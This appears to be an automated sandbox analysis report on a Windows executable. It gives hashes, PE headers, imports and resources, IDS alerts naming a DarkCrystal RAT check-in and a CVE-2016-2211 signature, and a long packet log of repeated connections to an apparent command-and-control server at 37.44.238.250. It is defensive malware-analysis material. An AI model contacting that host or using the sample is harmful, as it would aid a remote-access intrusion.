                                                                                            SHA256:3d92f050fc88966bd639d315d04fa9fb686ba5f61b2ac81c1e47449125a5a9cb
                                                                                            SHA512:3a9e138d8682f6e22ddcdd480da8cd6893d86cf1e48b7e4232c1cd87a9abe2a3e29577201ace85cf551739c33855352c081c85a2992eb60c2947a1524634580e
                                                                                            SSDEEP:24576:2TbBv5rUyXVfKEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6c:IBJfp1JAz5cjb6k4cFdaNjTXfa/h
                                                                                            TLSH:B5959D0675E28E73C2B01A318566463E92E1D6613661FB1F365F2497AC0B7E08F736B3
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                            Icon Hash:1515d4d4442f2d2d
                                                                                            Entrypoint:0x41f530
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                            Instruction
                                                                                            call 00007F538CDE32EBh
                                                                                            jmp 00007F538CDE2BFDh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007F538CDD5A47h
                                                                                            mov dword ptr [esi], 004356D0h
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 004356D8h
                                                                                            mov dword ptr [ecx], 004356D0h
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            mov esi, ecx
                                                                                            lea eax, dword ptr [esi+04h]
                                                                                            mov dword ptr [esi], 004356B8h
                                                                                            push eax
                                                                                            call 00007F538CDE608Fh
                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                            pop ecx
                                                                                            je 00007F538CDE2D8Ch
                                                                                            push 0000000Ch
                                                                                            push esi
                                                                                            call 00007F538CDE2349h
                                                                                            pop ecx
                                                                                            pop ecx
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007F538CDD59C2h
                                                                                            push 0043BEF0h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007F538CDE5B49h
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007F538CDE2D08h
                                                                                            push 0043C0F4h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007F538CDE5B2Ch
                                                                                            int3
                                                                                            jmp 00007F538CDE75C7h
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00422900h
                                                                                            push dword ptr fs:[00000000h]
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x3d070          0x34          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3d0a4          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x64000          0xdff8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x72000          0x233c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3b11c          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x355f8          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x33000          0x278         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x3c5ec          0x120         .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x31bdc       0x31c00   2831bb8b11e3209658a53131886cdf98  False     0.5909380888819096   data       6.712962136932442   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x33000          0xaec0        0xb000    042f11346230ca5aa360727d9908e809  False     0.4579190340909091   data       5.261605615899847   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3e000          0x24720       0x1000    9670b581969e508258d8bc903025de5e  False     0.451416015625       data       4.387459135575936   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat  0x63000          0x190         0x200     c83554035c63bb446c6208d0c8fa0256  False     0.4453125            data       3.3327310103022305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x64000          0xdff8        0xe000    ba08fbcd0ed7d9e6a268d75148d9914b  False     0.6373639787946429   data       6.638661032196024   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x72000          0x233c        0x2400    40b5e17755fd6fdd34de06e5cdb7f711  False     0.7749565972222222   data       6.623012966548067   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333

DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Language of compilation system | Country where language is spoken | Map
English | United States

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T23:52:18.200573+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-05T23:52:32.430448+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | TCP
2024-11-05T23:52:57.106277+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49767 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Nov 5, 2024 23:52:35.586251020 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:35.713176966 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.008297920 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.079199076 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.079267025 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.217073917 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.217223883 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.218266964 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.223434925 CET804973937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.223449945 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.223488092 CET4973980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.223539114 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.223640919 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.224756956 CET804974237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.224806070 CET4974280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.229887962 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:36.574080944 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:36.578969002 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.035279036 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.105963945 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.106033087 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.230787992 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.231004953 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.235987902 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.236145973 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.236274958 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.236437082 CET804974337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.236496925 CET4974380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.241489887 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:37.586878061 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:37.591830969 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262613058 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262666941 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262705088 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.262729883 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.262790918 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.425426960 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.426894903 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.431024075 CET804974537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.431088924 CET4974580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.431766987 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.431832075 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.431940079 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.436755896 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:38.790508032 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:38.795547009 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.057285070 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.062376022 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.062510967 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.062621117 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.065615892 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.067464113 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.071046114 CET804974637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.071096897 CET4974680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.197110891 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.202002048 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.202100039 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.202200890 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.207005978 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.415720940 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.420819998 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.420861006 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.555944920 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:39.560802937 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.864979982 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.940107107 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:39.940215111 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.024277925 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.101548910 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.101608992 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.232307911 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.232333899 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.233521938 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.237670898 CET804974837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.237907887 CET4974880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.238181114 CET804974937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.238234997 CET4974980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.238321066 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.238384008 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.238478899 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.243330956 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:40.590897083 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:40.595936060 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.049932003 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.102310896 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.125943899 CET804975137.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.305434942 CET4975180192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.378390074 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.383565903 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.383646965 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.383840084 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.388791084 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:41.743778944 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:41.891171932 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.205102921 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.273930073 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.273988962 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.511647940 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.512092113 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.517040968 CET804975237.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.517129898 CET4975280192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.517429113 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.517512083 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.517615080 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.522464991 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:42.867999077 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:42.872884035 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.338536024 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.409671068 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.412168026 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.600125074 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.600507021 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.605317116 CET804975337.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.605381012 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.605439901 CET4975380192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.605472088 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.607105970 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.611938953 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:43.961815119 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:43.966801882 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.419316053 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.492446899 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.492511988 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.614573956 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.615333080 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.620240927 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.620325089 CET804975437.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.620326996 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.620372057 CET4975480192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.620465994 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.625566006 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.947005033 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.947463989 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.952428102 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.952564001 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.952656984 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:44.957540035 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:44.999794006 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.070702076 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.075664997 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.075737953 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.075854063 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.082360029 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.305617094 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.430764914 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.493952990 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494024992 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.494072914 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494179964 CET4975580192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.494774103 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494832993 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.494862080 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.498943090 CET804975537.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.772169113 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.851747036 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.851804018 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:45.897156954 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.965421915 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:45.965512037 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.287731886 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.287807941 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.288765907 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293232918 CET804975637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.293287039 CET4975680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293622971 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.293690920 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293766975 CET804975737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.293800116 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.293812037 CET4975780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.298579931 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:46.649306059 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:46.654371023 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.105568886 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.175134897 CET804975837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:47.175204992 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.305011034 CET4975880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:47.305649042 CET4975980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:53:03.594216108 CET804979237.44.238.250192.168.2.4
